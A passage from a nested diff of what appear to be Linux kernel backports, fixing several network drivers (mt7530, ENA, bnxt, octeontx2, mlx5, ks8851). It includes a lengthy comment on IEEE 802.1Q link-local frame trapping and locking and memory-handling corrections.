+-			} else if ((msg->msg[2] & 0xf) == CEC_OP_PROG_ERROR_DUPLICATE) {
+-				if (msg->len < 5)
+-					valid_la = false;
+-			}
+-			break;
+ 		case CEC_MSG_RECORD_ON:
+ 			switch (msg->msg[2]) {
+ 			case CEC_OP_RECORD_SRC_OWN:
+diff --git a/drivers/net/dsa/mt7530.c b/drivers/net/dsa/mt7530.c
+index 07065c1af55e4..d4515c19a5f34 100644
+--- a/drivers/net/dsa/mt7530.c
++++ b/drivers/net/dsa/mt7530.c
+@@ -998,20 +998,173 @@ static void mt7530_setup_port5(struct dsa_switch *ds, phy_interface_t interface)
+ 	mutex_unlock(&priv->reg_mutex);
+ }
+ 
+-/* On page 205, section "8.6.3 Frame filtering" of the active standard, IEEE Std
+- * 802.1Q™-2022, it is stated that frames with 01:80:C2:00:00:00-0F as MAC DA
+- * must only be propagated to C-VLAN and MAC Bridge components. That means
+- * VLAN-aware and VLAN-unaware bridges. On the switch designs with CPU ports,
+- * these frames are supposed to be processed by the CPU (software). So we make
+- * the switch only forward them to the CPU port. And if received from a CPU
+- * port, forward to a single port. The software is responsible of making the
+- * switch conform to the latter by setting a single port as destination port on
+- * the special tag.
++/* In Clause 5 of IEEE Std 802-2014, two sublayers of the data link layer (DLL)
++ * of the Open Systems Interconnection basic reference model (OSI/RM) are
++ * described; the medium access control (MAC) and logical link control (LLC)
++ * sublayers. The MAC sublayer is the one facing the physical layer.
+  *
+- * This switch intellectual property cannot conform to this part of the standard
+- * fully. Whilst the REV_UN frame tag covers the remaining :04-0D and :0F MAC
+- * DAs, it also includes :22-FF which the scope of propagation is not supposed
+- * to be restricted for these MAC DAs.
++ * In 8.2 of IEEE Std 802.1Q-2022, the Bridge architecture is described. A
++ * Bridge component comprises a MAC Relay Entity for interconnecting the Ports
++ * of the Bridge, at least two Ports, and higher layer entities with at least a
++ * Spanning Tree Protocol Entity included.
++ *
++ * Each Bridge Port also functions as an end station and shall provide the MAC
++ * Service to an LLC Entity. Each instance of the MAC Service is provided to a
++ * distinct LLC Entity that supports protocol identification, multiplexing, and
++ * demultiplexing, for protocol data unit (PDU) transmission and reception by
++ * one or more higher layer entities.
++ *
++ * It is described in 8.13.9 of IEEE Std 802.1Q-2022 that in a Bridge, the LLC
++ * Entity associated with each Bridge Port is modeled as being directly
++ * connected to the attached Local Area Network (LAN).
++ *
++ * On the switch with CPU port architecture, CPU port functions as Management
++ * Port, and the Management Port functionality is provided by software which
++ * functions as an end station. Software is connected to an IEEE 802 LAN that is
++ * wholly contained within the system that incorporates the Bridge. Software
++ * provides access to the LLC Entity associated with each Bridge Port by the
++ * value of the source port field on the special tag on the frame received by
++ * software.
++ *
++ * We call frames that carry control information to determine the active
++ * topology and current extent of each Virtual Local Area Network (VLAN), i.e.,
++ * spanning tree or Shortest Path Bridging (SPB) and Multiple VLAN Registration
++ * Protocol Data Units (MVRPDUs), and frames from other link constrained
++ * protocols, such as Extensible Authentication Protocol over LAN (EAPOL) and
++ * Link Layer Discovery Protocol (LLDP), link-local frames. They are not
++ * forwarded by a Bridge. Permanently configured entries in the filtering
++ * database (FDB) ensure that such frames are discarded by the Forwarding
++ * Process. In 8.6.3 of IEEE Std 802.1Q-2022, this is described in detail:
++ *
++ * Each of the reserved MAC addresses specified in Table 8-1
++ * (01-80-C2-00-00-[00,01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F]) shall be
++ * permanently configured in the FDB in C-VLAN components and ERs.
++ *
++ * Each of the reserved MAC addresses specified in Table 8-2
++ * (01-80-C2-00-00-[01,02,03,04,05,06,07,08,09,0A,0E]) shall be permanently
++ * configured in the FDB in S-VLAN components.
++ *
++ * Each of the reserved MAC addresses specified in Table 8-3
++ * (01-80-C2-00-00-[01,02,04,0E]) shall be permanently configured in the FDB in
++ * TPMR components.
++ *
++ * The FDB entries for reserved MAC addresses shall specify filtering for all
++ * Bridge Ports and all VIDs. Management shall not provide the capability to
++ * modify or remove entries for reserved MAC addresses.
++ *
++ * The addresses in Table 8-1, Table 8-2, and Table 8-3 determine the scope of
++ * propagation of PDUs within a Bridged Network, as follows:
++ *
++ *   The Nearest Bridge group address (01-80-C2-00-00-0E) is an address that no
++ *   conformant Two-Port MAC Relay (TPMR) component, Service VLAN (S-VLAN)
++ *   component, Customer VLAN (C-VLAN) component, or MAC Bridge can forward.
++ *   PDUs transmitted using this destination address, or any other addresses
++ *   that appear in Table 8-1, Table 8-2, and Table 8-3
++ *   (01-80-C2-00-00-[00,01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F]), can
++ *   therefore travel no further than those stations that can be reached via a
++ *   single individual LAN from the originating station.
++ *
++ *   The Nearest non-TPMR Bridge group address (01-80-C2-00-00-03), is an
++ *   address that no conformant S-VLAN component, C-VLAN component, or MAC
++ *   Bridge can forward; however, this address is relayed by a TPMR component.
++ *   PDUs using this destination address, or any of the other addresses that
++ *   appear in both Table 8-1 and Table 8-2 but not in Table 8-3
++ *   (01-80-C2-00-00-[00,03,05,06,07,08,09,0A,0B,0C,0D,0F]), will be relayed by
++ *   any TPMRs but will propagate no further than the nearest S-VLAN component,
++ *   C-VLAN component, or MAC Bridge.
++ *
++ *   The Nearest Customer Bridge group address (01-80-C2-00-00-00) is an address
++ *   that no conformant C-VLAN component, MAC Bridge can forward; however, it is
++ *   relayed by TPMR components and S-VLAN components. PDUs using this
++ *   destination address, or any of the other addresses that appear in Table 8-1
++ *   but not in either Table 8-2 or Table 8-3 (01-80-C2-00-00-[00,0B,0C,0D,0F]),
++ *   will be relayed by TPMR components and S-VLAN components but will propagate
++ *   no further than the nearest C-VLAN component or MAC Bridge.
++ *
++ * Because the LLC Entity associated with each Bridge Port is provided via CPU
++ * port, we must not filter these frames but forward them to CPU port.
++ *
++ * In a Bridge, the transmission Port is majorly decided by ingress and egress
++ * rules, FDB, and spanning tree Port State functions of the Forwarding Process.
++ * For link-local frames, only CPU port should be designated as destination port
++ * in the FDB, and the other functions of the Forwarding Process must not
++ * interfere with the decision of the transmission Port. We call this process
++ * trapping frames to CPU port.
++ *
++ * Therefore, on the switch with CPU port architecture, link-local frames must
++ * be trapped to CPU port, and certain link-local frames received by a Port of a
++ * Bridge comprising a TPMR component or an S-VLAN component must be excluded
++ * from it.
++ *
++ * A Bridge of the switch with CPU port architecture cannot comprise a Two-Port
++ * MAC Relay (TPMR) component as a TPMR component supports only a subset of the
++ * functionality of a MAC Bridge. A Bridge comprising two Ports (Management Port
++ * doesn't count) of this architecture will either function as a standard MAC
++ * Bridge or a standard VLAN Bridge.
++ *
++ * Therefore, a Bridge of this architecture can only comprise S-VLAN components,
++ * C-VLAN components, or MAC Bridge components. Since there's no TPMR component,
++ * we don't need to relay PDUs using the destination addresses specified on the
++ * Nearest non-TPMR section, and the proportion of the Nearest Customer Bridge
++ * section where they must be relayed by TPMR components.
++ *
++ * One option to trap link-local frames to CPU port is to add static FDB entries
++ * with CPU port designated as destination port. However, because that
++ * Independent VLAN Learning (IVL) is being used on every VID, each entry only
++ * applies to a single VLAN Identifier (VID). For a Bridge comprising a MAC
++ * Bridge component or a C-VLAN component, there would have to be 16 times 4096
++ * entries. This switch intellectual property can only hold a maximum of 2048
++ * entries. Using this option, there also isn't a mechanism to prevent
++ * link-local frames from being discarded when the spanning tree Port State of
++ * the reception Port is discarding.
++ *
++ * The remaining option is to utilise the BPC, RGAC1, RGAC2, RGAC3, and RGAC4
++ * registers. Whilst this applies to every VID, it doesn't contain all of the
++ * reserved MAC addresses without affecting the remaining Standard Group MAC
++ * Addresses. The REV_UN frame tag utilised using the RGAC4 register covers the
++ * remaining 01-80-C2-00-00-[04,05,06,07,08,09,0A,0B,0C,0D,0F] destination
++ * addresses. It also includes the 01-80-C2-00-00-22 to 01-80-C2-00-00-FF
++ * destination addresses which may be relayed by MAC Bridges or VLAN Bridges.
++ * The latter option provides better but not complete conformance.
++ *
++ * This switch intellectual property also does not provide a mechanism to trap
++ * link-local frames with specific destination addresses to CPU port by Bridge,
++ * to conform to the filtering rules for the distinct Bridge components.
++ *
++ * Therefore, regardless of the type of the Bridge component, link-local frames
++ * with these destination addresses will be trapped to CPU port:
++ *
++ * 01-80-C2-00-00-[00,01,02,03,0E]
++ *
++ * In a Bridge comprising a MAC Bridge component or a C-VLAN component:
++ *
++ *   Link-local frames with these destination addresses won't be trapped to CPU
++ *   port which won't conform to IEEE Std 802.1Q-2022:
++ *
++ *   01-80-C2-00-00-[04,05,06,07,08,09,0A,0B,0C,0D,0F]
++ *
++ * In a Bridge comprising an S-VLAN component:
++ *
++ *   Link-local frames with these destination addresses will be trapped to CPU
++ *   port which won't conform to IEEE Std 802.1Q-2022:
++ *
++ *   01-80-C2-00-00-00
++ *
++ *   Link-local frames with these destination addresses won't be trapped to CPU
++ *   port which won't conform to IEEE Std 802.1Q-2022:
++ *
++ *   01-80-C2-00-00-[04,05,06,07,08,09,0A]
++ *
++ * To trap link-local frames to CPU port as conformant as this switch
++ * intellectual property can allow, link-local frames are made to be regarded as
++ * Bridge Protocol Data Units (BPDUs). This is because this switch intellectual
++ * property only lets the frames regarded as BPDUs bypass the spanning tree Port
++ * State function of the Forwarding Process.
++ *
++ * The only remaining interference is the ingress rules. When the reception Port
++ * has no PVID assigned on software, VLAN-untagged frames won't be allowed in.
++ * There doesn't seem to be a mechanism on the switch intellectual property to
++ * have link-local frames bypass this function of the Forwarding Process.
+  */
+ static void
+ mt753x_trap_frames(struct mt7530_priv *priv)
+@@ -1019,35 +1172,43 @@ mt753x_trap_frames(struct mt7530_priv *priv)
+ 	/* Trap 802.1X PAE frames and BPDUs to the CPU port(s) and egress them
+ 	 * VLAN-untagged.
+ 	 */
+-	mt7530_rmw(priv, MT753X_BPC, MT753X_PAE_EG_TAG_MASK |
+-		   MT753X_PAE_PORT_FW_MASK | MT753X_BPDU_EG_TAG_MASK |
+-		   MT753X_BPDU_PORT_FW_MASK,
+-		   MT753X_PAE_EG_TAG(MT7530_VLAN_EG_UNTAGGED) |
+-		   MT753X_PAE_PORT_FW(MT753X_BPDU_CPU_ONLY) |
+-		   MT753X_BPDU_EG_TAG(MT7530_VLAN_EG_UNTAGGED) |
+-		   MT753X_BPDU_CPU_ONLY);
++	mt7530_rmw(priv, MT753X_BPC,
++		   MT753X_PAE_BPDU_FR | MT753X_PAE_EG_TAG_MASK |
++			   MT753X_PAE_PORT_FW_MASK | MT753X_BPDU_EG_TAG_MASK |
++			   MT753X_BPDU_PORT_FW_MASK,
++		   MT753X_PAE_BPDU_FR |
++			   MT753X_PAE_EG_TAG(MT7530_VLAN_EG_UNTAGGED) |
++			   MT753X_PAE_PORT_FW(MT753X_BPDU_CPU_ONLY) |
++			   MT753X_BPDU_EG_TAG(MT7530_VLAN_EG_UNTAGGED) |
++			   MT753X_BPDU_CPU_ONLY);
+ 
+ 	/* Trap frames with :01 and :02 MAC DAs to the CPU port(s) and egress
+ 	 * them VLAN-untagged.
+ 	 */
+-	mt7530_rmw(priv, MT753X_RGAC1, MT753X_R02_EG_TAG_MASK |
+-		   MT753X_R02_PORT_FW_MASK | MT753X_R01_EG_TAG_MASK |
+-		   MT753X_R01_PORT_FW_MASK,
+-		   MT753X_R02_EG_TAG(MT7530_VLAN_EG_UNTAGGED) |
+-		   MT753X_R02_PORT_FW(MT753X_BPDU_CPU_ONLY) |
+-		   MT753X_R01_EG_TAG(MT7530_VLAN_EG_UNTAGGED) |
+-		   MT753X_BPDU_CPU_ONLY);
++	mt7530_rmw(priv, MT753X_RGAC1,
++		   MT753X_R02_BPDU_FR | MT753X_R02_EG_TAG_MASK |
++			   MT753X_R02_PORT_FW_MASK | MT753X_R01_BPDU_FR |
++			   MT753X_R01_EG_TAG_MASK | MT753X_R01_PORT_FW_MASK,
++		   MT753X_R02_BPDU_FR |
++			   MT753X_R02_EG_TAG(MT7530_VLAN_EG_UNTAGGED) |
++			   MT753X_R02_PORT_FW(MT753X_BPDU_CPU_ONLY) |
++			   MT753X_R01_BPDU_FR |
++			   MT753X_R01_EG_TAG(MT7530_VLAN_EG_UNTAGGED) |
++			   MT753X_BPDU_CPU_ONLY);
+ 
+ 	/* Trap frames with :03 and :0E MAC DAs to the CPU port(s) and egress
+ 	 * them VLAN-untagged.
+ 	 */
+-	mt7530_rmw(priv, MT753X_RGAC2, MT753X_R0E_EG_TAG_MASK |
+-		   MT753X_R0E_PORT_FW_MASK | MT753X_R03_EG_TAG_MASK |
+-		   MT753X_R03_PORT_FW_MASK,
+-		   MT753X_R0E_EG_TAG(MT7530_VLAN_EG_UNTAGGED) |
+-		   MT753X_R0E_PORT_FW(MT753X_BPDU_CPU_ONLY) |
+-		   MT753X_R03_EG_TAG(MT7530_VLAN_EG_UNTAGGED) |
+-		   MT753X_BPDU_CPU_ONLY);
++	mt7530_rmw(priv, MT753X_RGAC2,
++		   MT753X_R0E_BPDU_FR | MT753X_R0E_EG_TAG_MASK |
++			   MT753X_R0E_PORT_FW_MASK | MT753X_R03_BPDU_FR |
++			   MT753X_R03_EG_TAG_MASK | MT753X_R03_PORT_FW_MASK,
++		   MT753X_R0E_BPDU_FR |
++			   MT753X_R0E_EG_TAG(MT7530_VLAN_EG_UNTAGGED) |
++			   MT753X_R0E_PORT_FW(MT753X_BPDU_CPU_ONLY) |
++			   MT753X_R03_BPDU_FR |
++			   MT753X_R03_EG_TAG(MT7530_VLAN_EG_UNTAGGED) |
++			   MT753X_BPDU_CPU_ONLY);
+ }
+ 
+ static int
+diff --git a/drivers/net/dsa/mt7530.h b/drivers/net/dsa/mt7530.h
+index fa2afa67ceb07..2d1ea390f05ab 100644
+--- a/drivers/net/dsa/mt7530.h
++++ b/drivers/net/dsa/mt7530.h
+@@ -63,6 +63,7 @@ enum mt753x_id {
+ 
+ /* Registers for BPDU and PAE frame control*/
+ #define MT753X_BPC			0x24
++#define  MT753X_PAE_BPDU_FR		BIT(25)
+ #define  MT753X_PAE_EG_TAG_MASK		GENMASK(24, 22)
+ #define  MT753X_PAE_EG_TAG(x)		FIELD_PREP(MT753X_PAE_EG_TAG_MASK, x)
+ #define  MT753X_PAE_PORT_FW_MASK	GENMASK(18, 16)
+@@ -73,20 +74,24 @@ enum mt753x_id {
+ 
+ /* Register for :01 and :02 MAC DA frame control */
+ #define MT753X_RGAC1			0x28
++#define  MT753X_R02_BPDU_FR		BIT(25)
+ #define  MT753X_R02_EG_TAG_MASK		GENMASK(24, 22)
+ #define  MT753X_R02_EG_TAG(x)		FIELD_PREP(MT753X_R02_EG_TAG_MASK, x)
+ #define  MT753X_R02_PORT_FW_MASK	GENMASK(18, 16)
+ #define  MT753X_R02_PORT_FW(x)		FIELD_PREP(MT753X_R02_PORT_FW_MASK, x)
++#define  MT753X_R01_BPDU_FR		BIT(9)
+ #define  MT753X_R01_EG_TAG_MASK		GENMASK(8, 6)
+ #define  MT753X_R01_EG_TAG(x)		FIELD_PREP(MT753X_R01_EG_TAG_MASK, x)
+ #define  MT753X_R01_PORT_FW_MASK	GENMASK(2, 0)
+ 
+ /* Register for :03 and :0E MAC DA frame control */
+ #define MT753X_RGAC2			0x2c
++#define  MT753X_R0E_BPDU_FR		BIT(25)
+ #define  MT753X_R0E_EG_TAG_MASK		GENMASK(24, 22)
+ #define  MT753X_R0E_EG_TAG(x)		FIELD_PREP(MT753X_R0E_EG_TAG_MASK, x)
+ #define  MT753X_R0E_PORT_FW_MASK	GENMASK(18, 16)
+ #define  MT753X_R0E_PORT_FW(x)		FIELD_PREP(MT753X_R0E_PORT_FW_MASK, x)
++#define  MT753X_R03_BPDU_FR		BIT(9)
+ #define  MT753X_R03_EG_TAG_MASK		GENMASK(8, 6)
+ #define  MT753X_R03_EG_TAG(x)		FIELD_PREP(MT753X_R03_EG_TAG_MASK, x)
+ #define  MT753X_R03_PORT_FW_MASK	GENMASK(2, 0)
+diff --git a/drivers/net/ethernet/amazon/ena/ena_com.c b/drivers/net/ethernet/amazon/ena/ena_com.c
+index 633b321d7fdd9..4db689372980e 100644
+--- a/drivers/net/ethernet/amazon/ena/ena_com.c
++++ b/drivers/net/ethernet/amazon/ena/ena_com.c
+@@ -362,7 +362,7 @@ static int ena_com_init_io_sq(struct ena_com_dev *ena_dev,
+ 			ENA_COM_BOUNCE_BUFFER_CNTRL_CNT;
+ 		io_sq->bounce_buf_ctrl.next_to_use = 0;
+ 
+-		size = io_sq->bounce_buf_ctrl.buffer_size *
++		size = (size_t)io_sq->bounce_buf_ctrl.buffer_size *
+ 			io_sq->bounce_buf_ctrl.buffers_num;
+ 
+ 		dev_node = dev_to_node(ena_dev->dmadev);
+diff --git a/drivers/net/ethernet/amazon/ena/ena_netdev.c b/drivers/net/ethernet/amazon/ena/ena_netdev.c
+index 9e82e7b9c3b72..5e37b18ac3adf 100644
+--- a/drivers/net/ethernet/amazon/ena/ena_netdev.c
++++ b/drivers/net/ethernet/amazon/ena/ena_netdev.c
+@@ -1203,8 +1203,11 @@ static void ena_unmap_tx_buff(struct ena_ring *tx_ring,
+ static void ena_free_tx_bufs(struct ena_ring *tx_ring)
+ {
+ 	bool print_once = true;
++	bool is_xdp_ring;
+ 	u32 i;
+ 
++	is_xdp_ring = ENA_IS_XDP_INDEX(tx_ring->adapter, tx_ring->qid);
++
+ 	for (i = 0; i < tx_ring->ring_size; i++) {
+ 		struct ena_tx_buffer *tx_info = &tx_ring->tx_buffer_info[i];
+ 
+@@ -1224,10 +1227,15 @@ static void ena_free_tx_bufs(struct ena_ring *tx_ring)
+ 
+ 		ena_unmap_tx_buff(tx_ring, tx_info);
+ 
+-		dev_kfree_skb_any(tx_info->skb);
++		if (is_xdp_ring)
++			xdp_return_frame(tx_info->xdpf);
++		else
++			dev_kfree_skb_any(tx_info->skb);
+ 	}
+-	netdev_tx_reset_queue(netdev_get_tx_queue(tx_ring->netdev,
+-						  tx_ring->qid));
++
++	if (!is_xdp_ring)
++		netdev_tx_reset_queue(netdev_get_tx_queue(tx_ring->netdev,
++							  tx_ring->qid));
+ }
+ 
+ static void ena_free_all_tx_bufs(struct ena_adapter *adapter)
+@@ -3797,10 +3805,11 @@ static void check_for_missing_completions(struct ena_adapter *adapter)
+ {
+ 	struct ena_ring *tx_ring;
+ 	struct ena_ring *rx_ring;
+-	int i, budget, rc;
++	int qid, budget, rc;
+ 	int io_queue_count;
+ 
+ 	io_queue_count = adapter->xdp_num_queues + adapter->num_io_queues;
++
+ 	/* Make sure the driver doesn't turn the device in other process */
+ 	smp_rmb();
+ 
+@@ -3813,27 +3822,29 @@ static void check_for_missing_completions(struct ena_adapter *adapter)
+ 	if (adapter->missing_tx_completion_to == ENA_HW_HINTS_NO_TIMEOUT)
+ 		return;
+ 
+-	budget = ENA_MONITORED_TX_QUEUES;
++	budget = min_t(u32, io_queue_count, ENA_MONITORED_TX_QUEUES);
+ 
+-	for (i = adapter->last_monitored_tx_qid; i < io_queue_count; i++) {
+-		tx_ring = &adapter->tx_ring[i];
+-		rx_ring = &adapter->rx_ring[i];
++	qid = adapter->last_monitored_tx_qid;
++
++	while (budget) {
++		qid = (qid + 1) % io_queue_count;
++
++		tx_ring = &adapter->tx_ring[qid];
++		rx_ring = &adapter->rx_ring[qid];
+ 
+ 		rc = check_missing_comp_in_tx_queue(adapter, tx_ring);
+ 		if (unlikely(rc))
+ 			return;
+ 
+-		rc =  !ENA_IS_XDP_INDEX(adapter, i) ?
++		rc =  !ENA_IS_XDP_INDEX(adapter, qid) ?
+ 			check_for_rx_interrupt_queue(adapter, rx_ring) : 0;
+ 		if (unlikely(rc))
+ 			return;
+ 
+ 		budget--;
+-		if (!budget)
+-			break;
+ 	}
+ 
+-	adapter->last_monitored_tx_qid = i % io_queue_count;
++	adapter->last_monitored_tx_qid = qid;
+ }
+ 
+ /* trigger napi schedule after 2 consecutive detections */
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+index f810b5dc25f01..0d0aad7141c15 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+@@ -10564,6 +10564,8 @@ static int __bnxt_open_nic(struct bnxt *bp, bool irq_re_init, bool link_re_init)
+ 	/* VF-reps may need to be re-opened after the PF is re-opened */
+ 	if (BNXT_PF(bp))
+ 		bnxt_vf_reps_open(bp);
++	if (bp->ptp_cfg)
++		atomic_set(&bp->ptp_cfg->tx_avail, BNXT_MAX_TX_TS);
+ 	bnxt_ptp_init_rtc(bp, true);
+ 	bnxt_ptp_cfg_tstamp_filters(bp);
+ 	return 0;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+index bb99302eab67a..67080d5053e07 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+@@ -4237,18 +4237,18 @@ static int rvu_nix_block_init(struct rvu *rvu, struct nix_hw *nix_hw)
+ 		 */
+ 		rvu_write64(rvu, blkaddr, NIX_AF_CFG,
+ 			    rvu_read64(rvu, blkaddr, NIX_AF_CFG) | 0x40ULL);
++	}
+ 
+-		/* Set chan/link to backpressure TL3 instead of TL2 */
+-		rvu_write64(rvu, blkaddr, NIX_AF_PSE_CHANNEL_LEVEL, 0x01);
++	/* Set chan/link to backpressure TL3 instead of TL2 */
++	rvu_write64(rvu, blkaddr, NIX_AF_PSE_CHANNEL_LEVEL, 0x01);
+ 
+-		/* Disable SQ manager's sticky mode operation (set TM6 = 0)
+-		 * This sticky mode is known to cause SQ stalls when multiple
+-		 * SQs are mapped to same SMQ and transmitting pkts at a time.
+-		 */
+-		cfg = rvu_read64(rvu, blkaddr, NIX_AF_SQM_DBG_CTL_STATUS);
+-		cfg &= ~BIT_ULL(15);
+-		rvu_write64(rvu, blkaddr, NIX_AF_SQM_DBG_CTL_STATUS, cfg);
+-	}
++	/* Disable SQ manager's sticky mode operation (set TM6 = 0)
++	 * This sticky mode is known to cause SQ stalls when multiple
++	 * SQs are mapped to same SMQ and transmitting pkts at a time.
++	 */
++	cfg = rvu_read64(rvu, blkaddr, NIX_AF_SQM_DBG_CTL_STATUS);
++	cfg &= ~BIT_ULL(15);
++	rvu_write64(rvu, blkaddr, NIX_AF_SQM_DBG_CTL_STATUS, cfg);
+ 
+ 	ltdefs = rvu->kpu.lt_def;
+ 	/* Calibrate X2P bus to check if CGX/LBK links are fine */
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/qos.c b/drivers/net/ethernet/mellanox/mlx5/core/en/qos.c
+index 2842195ee548a..1e887d640cffc 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/qos.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/qos.c
+@@ -82,24 +82,25 @@ int mlx5e_open_qos_sq(struct mlx5e_priv *priv, struct mlx5e_channels *chs,
+ 
+ 	txq_ix = mlx5e_qid_from_qos(chs, node_qid);
+ 
+-	WARN_ON(node_qid > priv->htb_max_qos_sqs);
+-	if (node_qid == priv->htb_max_qos_sqs) {
+-		struct mlx5e_sq_stats *stats, **stats_list = NULL;
+-
+-		if (priv->htb_max_qos_sqs == 0) {
+-			stats_list = kvcalloc(mlx5e_qos_max_leaf_nodes(priv->mdev),
+-					      sizeof(*stats_list),
+-					      GFP_KERNEL);
+-			if (!stats_list)
+-				return -ENOMEM;
+-		}
++	WARN_ON(node_qid >= mlx5e_htb_cur_leaf_nodes(priv->htb));
++	if (!priv->htb_qos_sq_stats) {
++		struct mlx5e_sq_stats **stats_list;
++
++		stats_list = kvcalloc(mlx5e_qos_max_leaf_nodes(priv->mdev),
++				      sizeof(*stats_list), GFP_KERNEL);
++		if (!stats_list)
++			return -ENOMEM;
++
++		WRITE_ONCE(priv->htb_qos_sq_stats, stats_list);
++	}
++
++	if (!priv->htb_qos_sq_stats[node_qid]) {
++		struct mlx5e_sq_stats *stats;
++
+ 		stats = kzalloc(sizeof(*stats), GFP_KERNEL);
+-		if (!stats) {
+-			kvfree(stats_list);
++		if (!stats)
+ 			return -ENOMEM;
+-		}
+-		if (stats_list)
+-			WRITE_ONCE(priv->htb_qos_sq_stats, stats_list);
++
+ 		WRITE_ONCE(priv->htb_qos_sq_stats[node_qid], stats);
+ 		/* Order htb_max_qos_sqs increment after writing the array pointer.
+ 		 * Pairs with smp_load_acquire in en_stats.c.
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/selq.c b/drivers/net/ethernet/mellanox/mlx5/core/en/selq.c
+index f675b1926340f..f66bbc8464645 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/selq.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/selq.c
+@@ -57,6 +57,7 @@ int mlx5e_selq_init(struct mlx5e_selq *selq, struct mutex *state_lock)
+ 
+ void mlx5e_selq_cleanup(struct mlx5e_selq *selq)
+ {
++	mutex_lock(selq->state_lock);
+ 	WARN_ON_ONCE(selq->is_prepared);
+ 
+ 	kvfree(selq->standby);
+@@ -67,6 +68,7 @@ void mlx5e_selq_cleanup(struct mlx5e_selq *selq)
+ 
+ 	kvfree(selq->standby);
+ 	selq->standby = NULL;
++	mutex_unlock(selq->state_lock);
+ }
+ 
+ void mlx5e_selq_prepare_params(struct mlx5e_selq *selq, struct mlx5e_params *params)
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+index 9910a0480f589..e7d396434da36 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+@@ -5578,9 +5578,7 @@ void mlx5e_priv_cleanup(struct mlx5e_priv *priv)
+ 	kfree(priv->tx_rates);
+ 	kfree(priv->txq2sq);
+ 	destroy_workqueue(priv->wq);
+-	mutex_lock(&priv->state_lock);
+ 	mlx5e_selq_cleanup(&priv->selq);
+-	mutex_unlock(&priv->state_lock);
+ 	free_cpumask_var(priv->scratchpad.cpumask);
+ 
+ 	for (i = 0; i < priv->htb_max_qos_sqs; i++)
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/fs_core.c b/drivers/net/ethernet/mellanox/mlx5/core/fs_core.c
+index e6674118bc428..164e10b5f9b7f 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/fs_core.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/fs_core.c
+@@ -1752,8 +1752,9 @@ static struct mlx5_flow_handle *add_rule_fg(struct mlx5_flow_group *fg,
+ 	}
+ 	trace_mlx5_fs_set_fte(fte, false);
+ 
++	/* Link newly added rules into the tree. */
+ 	for (i = 0; i < handle->num_rules; i++) {
+-		if (refcount_read(&handle->rule[i]->node.refcount) == 1) {
++		if (!handle->rule[i]->node.parent) {
+ 			tree_add_node(&handle->rule[i]->node, &fte->node);
+ 			trace_mlx5_fs_add_rule(handle->rule[i]);
+ 		}
+diff --git a/drivers/net/ethernet/micrel/ks8851.h b/drivers/net/ethernet/micrel/ks8851.h
+index e5ec0a363aff8..31f75b4a67fd7 100644
+--- a/drivers/net/ethernet/micrel/ks8851.h
++++ b/drivers/net/ethernet/micrel/ks8851.h
+@@ -368,7 +368,6 @@ union ks8851_tx_hdr {
+  * @rdfifo: FIFO read callback
+  * @wrfifo: FIFO write callback
+  * @start_xmit: start_xmit() implementation callback
+- * @rx_skb: rx_skb() implementation callback
+  * @flush_tx_work: flush_tx_work() implementation callback
+  *
+  * The @statelock is used to protect information in the structure which may
+@@ -423,8 +422,6 @@ struct ks8851_net {
+ 					  struct sk_buff *txp, bool irq);
+ 	netdev_tx_t		(*start_xmit)(struct sk_buff *skb,
+ 					      struct net_device *dev);
+-	void			(*rx_skb)(struct ks8851_net *ks,
+-					  struct sk_buff *skb);
+ 	void			(*flush_tx_work)(struct ks8851_net *ks);
+ };
+ 
+diff --git a/drivers/net/ethernet/micrel/ks8851_common.c b/drivers/net/ethernet/micrel/ks8851_common.c
+index 0bf13b38b8f5b..d4cdf3d4f5525 100644
+--- a/drivers/net/ethernet/micrel/ks8851_common.c
++++ b/drivers/net/ethernet/micrel/ks8851_common.c
+@@ -231,16 +231,6 @@ static void ks8851_dbg_dumpkkt(struct ks8851_net *ks, u8 *rxpkt)
+ 		   rxpkt[12], rxpkt[13], rxpkt[14], rxpkt[15]);
+ }
+ 
+-/**
+- * ks8851_rx_skb - receive skbuff
+- * @ks: The device state.
+- * @skb: The skbuff
+- */
+-static void ks8851_rx_skb(struct ks8851_net *ks, struct sk_buff *skb)
+-{
+-	ks->rx_skb(ks, skb);
+-}
+-
+ /**
+  * ks8851_rx_pkts - receive packets from the host
+  * @ks: The device information.
+@@ -309,7 +299,7 @@ static void ks8851_rx_pkts(struct ks8851_net *ks)
+ 					ks8851_dbg_dumpkkt(ks, rxpkt);
+ 
+ 				skb->protocol = eth_type_trans(skb, ks->netdev);
+-				ks8851_rx_skb(ks, skb);
++				__netif_rx(skb);
+ 
+ 				ks->netdev->stats.rx_packets++;
+ 				ks->netdev->stats.rx_bytes += rxlen;
+@@ -340,6 +330,8 @@ static irqreturn_t ks8851_irq(int irq, void *_ks)
+ 	unsigned long flags;
+ 	unsigned int status;
+ 
++	local_bh_disable();
++
+ 	ks8851_lock(ks, &flags);
+ 
+ 	status = ks8851_rdreg16(ks, KS_ISR);
+@@ -416,6 +408,8 @@ static irqreturn_t ks8851_irq(int irq, void *_ks)
+ 	if (status & IRQ_LCI)
+ 		mii_check_link(&ks->mii);
+ 
++	local_bh_enable();
++
+ 	return IRQ_HANDLED;
+ }
+ 
